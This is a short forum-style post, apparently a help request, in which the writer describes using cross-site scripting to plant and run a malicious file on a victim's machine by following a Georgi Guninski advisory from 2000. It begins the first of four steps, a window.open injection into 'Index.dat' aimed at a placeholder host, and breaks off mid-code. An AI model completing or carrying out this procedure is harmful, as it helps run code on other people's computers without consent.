HI All, I am testing Cross-Site Scripting to Inject and run malicious code. I was following Georgi Guninski’s Advisory, which was published on Date: 23 November 2000. Following this advisory, I am trying to inject some malicious file at victim’s machine & then to run that injected file. According to this advisory we have to perform following four steps to Inject some file & Run that file. 1) inject JavaScript in “Index.dat” by window.open("http://somehost/index.html?